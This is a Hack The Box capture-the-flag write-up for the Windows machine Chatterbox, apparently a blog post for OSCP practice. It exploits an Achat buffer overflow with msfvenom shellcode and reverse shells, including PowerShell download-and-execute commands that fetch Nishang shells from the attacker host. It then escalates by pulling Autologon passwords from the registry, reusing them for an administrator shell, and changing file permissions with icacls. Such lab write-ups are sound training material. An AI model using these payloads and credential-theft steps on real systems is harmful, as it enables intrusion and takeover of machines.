Hack The Box — Chatterbox
Chatterbox is a Medium level Windows BufferOverflow machine on hack the box and a part of Tj null’s playlist for OSCP prep.This is a buffer overflow machine in which we run our exploit on the Achat service.We also abuse permissions using icacls to read the root flag.I will covering both ways to solve this machine.
NOTE: This box is highly unstable and the only ports open are 9255 and 9256.So first do an nmap on these ports and check if Achat service is running instead of doing a full port scen(-p- ) If Achat service is not running, restart the machine.Users have often reported losing their shells as well.
The only ports open are 9255 and 9256 which seems to run a wierd service called Achat, so lets google it and we learn that it is vulnerable to buffer overflow attacks.
We use searchsploit to find any exploits for Achat service and we do find one and download it using (- m) and it gets saved as 36025.py by default.
If we open the exploit code, we see a comment # of a msfvenom command which the author had hopefully left for us to make the shellcode.
However we have to make some changes to the script. Instead of using a windows/exec payload which is used by default in the script to run an executable called calc.exe, we will rather use a windows/shell_reverse_tcp payload (-p) instead of windows/exec payload used by default in the script and thus also remove the CMD=calc.exe since we are not executing any executable. moreover we need to add LHOST and LPORT.
THIS IS WHAT OUR FINAL MSFVENOM COMMAND SHOULD LOOK LIKE-
msfvenom -a x86 — platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.22 LPORT=7777 -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python
Copy the Shellcode and replace it with default (buf) part of the script
NOTE: In our default script, if we scroll down,we see that there is a maximum length limit of 1152 bytes on the payload(refer the image below). Anything that exceeds that will probably not work. We’ll keep that in mind when using msfvenom to generate our reverse shell.(luckily our previous msfvenom command made a shellcode of around 774 bytes so within the limit)
We also have to change the ip and port to that of our target.
Now Start a netcat listener on port 7777 and FINALLY we run the exploit using — python 36025.py
AND WE HAVE A SHELL !!!
We can now try running commands like whoami /priv, systeminfo to find our more about our target.We can also run scripts like Powerup.ps1 or WINPEAS.
Seems like Potato attacks wont work due to lack of privileges.SetImpersonatePrivilege is not enabled so we can’t use the Juicy Potato exploit to escalate privileges.
In systeminfo command, look at the option called HOTFIX which is basically a list of patches.We see a lot of patches on the system so it seems like Kernel Exploit wont work.Otherwise we could had found one by searching for the system build. Anyways lets look at directories. . .
we find root.txt in administrator/desktop however we are unable to read it. However the wierd part is that we can access /administrator because generally we do not have the permission to access this folder and it shows access denied.(if you have solved other boxes on HTB, you will understand)
Lets see what other permissions we have on this root.txt file.We can use icacls to view permissions. And we see that the administrator has (F) Full Access to root.txt .
(However don’t forget that we are still not administrator we are currently a normal user called Alfred )
Lets also run the icacls command on the current directory since we were able to access it as a regular user Alfred we must surely be having some access to the directory! and Volia we see that Alfred has (F) Full Access to the current directory.In fact Alfred has been configured to own the root.txt file since it has (OI)-Object Inherit. For more info, refer a guide on icacls on google
If we even google how to grant permission to a user using icacls, we find this on stackoverflow-
So lets grant ourselves(Alfred) access to it using the following command.And Finally we are able to read the root flag.
ALTERNATE METHOD- POWERSHELL
We can also try using windows/powershell_reverse_tcp payload (-p) instead of windows/shell_reverse_tcp as used earlier-
This part of the writeup has been taken from Rana Khalil’s writeup as a part of my notekeeping.Since i was unable to access the box as it got crashed,i was unable to cover it in the writeup.
(Link to Rana Khalil’s writeup-https://ranakhalil101.medium.com/hack-the-box-chatterbox-writeup-w-o-metasploit-c8421ac09318)
msfvenom -a x86 — platform Windows -p windows/powershell_reverse_tcp LHOST=10.10.14.22 LPORT=6666 -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python
HOWEVER WE SEE THAT THE PAYLOAD SIZE EXCEEDS THE SIZE LIMIT MENTIONED IN THE EXPLOIT !!!
So instead, we’ll just use the windows/exec module to download and execute the Nishang reverse shell.
Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.
cp ../../tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1
Add the following line to the end of the script with the attack machine configuration settings.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 1234
When called, this sends a reverse shell back to our attack machine on port 1234.
Setup a listener to receive the reverse shell.
nc -nlvp 1234
Next, use msfvenom to generate a payload that downloads the PowerShell script and executes it.
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
We get back the following result.
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 684 (iteration=0)
x86/unicode_mixed chosen with final size 684
Payload size: 684 bytes
Final size of python file: 3330 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
Good! The payload size is 684 bytes, so it’s within the limit. Copy the payload and add it in place of the payload included in the exploit.
Start up a python server in the directory that the PowerShell script resides in.
python -m SimpleHTTPServer 5555
Run the exploit.
root@kali:~/Desktop/htb/chatterbox# python 36025.py
We get a PowerShell shell!
We’ll use the PowerUp.ps1 script to determine if there are any misconfigurations that lead to privilege escalation.
Upload and run the script on the target machine.
PS C:\Users\Alfred\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/PowerUp.ps1')PS C:\Users\Alfred\Desktop> Invoke-AllChecks
We get back two interesting results.
[*] Checking for Autologon credentials in registry...DefaultDomainName :
DefaultUserName : Alfred
DefaultPassword : Welcome1!
AltDefaultPassword :[*] Checking for unattended install files...UnattendPath : C:\Windows\Panther\Unattend.xml
Viewing the Unattend.xml file, we see that the password was redacted. So let’s focus on the Autologon credentials. The default username is “Alfred” and the default password is “Welcome1!”. I don’t have much experience with Windows, so I googled- Autologin credentials to learn more about it.
As stated in the article, these credentials are stored in the registry in plain text. The manual commands for extracting these credentials are:
PS C:\Windows\system32> (Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName
Alfred PS C:\Windows\system32> (Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword
These credentials are set by the administrator. Since users have a tendency to reuse passwords, let’s see if the administrator account is set to the same password.
To do that, first run the following command to convert the plain text string “Welcome1!” into a secure string and store the result in the $password variable.
$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
- ConvertTo-SecureString: Converts plain text to secure strings.
- -AsPlainText: Specifies a plain text string to convert to a secure string.
- -Force: Confirms that you understand the implications of using the AsPlainText parameter and still want to use it.
Second, create a new object to store these credentials.
$cred = New-Object System.Management.Automation.PSCredential('Administrator', $password)
Third, we’ll use these credentials to start PowerShell and send a (hopefully privileged) reverse shell back to our attack machine.
In the attack machine, copy the shell.ps1 script we used earlier and save it in the file shell-admin.ps1.
cp shell.ps1 shell-admin.ps1
Change shell-admin.ps1 to send a reverse shell to our attack machine on port 6666.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 6666
Setup a python server in the directory that the script resides in.
python -m SimpleHTTPServer 5555
Setup a listener to receive the reverse shell.
nc -nlvp 6666
On the target machine, use the credentials to start PowerShell to download the shell-admin.ps1 script, run it and send a reverse shell back to our attack machine.
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:5555/shell-admin.ps1')" -Credential $cred
We get a shell with administrator privileges!
Now we can view the root.txt flag without having to change the ACL permissions on it.
In this box we learnt that -
- We can run bufferoverflow exploit on a vulnerable service after making certain changes to the exploit.However we need to make sure that the shellcode which we generate using msfvenom it is within the maximum limit.
- There are multiple payloads which can be used with msfvenom like :
windows/shell_reverse_tcp OR windows/powershell_reverse_tcp OR
windows/exec CMD=”powershell -c iex(new-object net.webclient).downloadstring(‘http://10.10.14.22:8000/Invoke-PowerShellTcp.ps1')" ~make changes accordingly
- We can use icacls to view or grant file permissions to users
- We can abuse Autologon feature in windows to view credentails in plain text and also sometimes reuse the user credentials to log in as admin since often the user passwords are reused by the admin user.
I hope you find this writeup helpful and make sure to follow me here on Medium for more such ctfs writeups.